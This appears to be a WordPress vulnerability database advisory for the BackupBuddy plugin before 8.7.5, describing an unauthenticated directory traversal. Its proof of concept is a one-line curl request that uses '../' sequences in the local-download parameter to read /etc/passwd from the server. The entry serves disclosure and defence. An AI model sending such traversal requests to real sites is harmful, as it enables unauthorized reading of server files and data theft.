WordPress Plugin Vulnerabilities
BackupBuddy < 8.7.5 - Unauthenticated Arbitrary File Access
Description
The plugin is affected by a Directory Traversal attack, allowing unauthenticated attackers to access arbitrary files on the web server, starting in version 8.5.8.0.
Proof of Concept
Install BackupBuddy v8.5.8.0 through v8.7.4.1. curl 'https://example.com/wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=0' (assuming your local path is set to something like /var/www/html/).
Affects Plugins
References
Classification
Type
TRAVERSAL
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lew Ayotte & Timothy Jacobs
Submitter
iThemes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-06 (about 1 years ago)
Added
2022-09-07 (about 1 years ago)
Last Updated
2022-09-07 (about 1 years ago)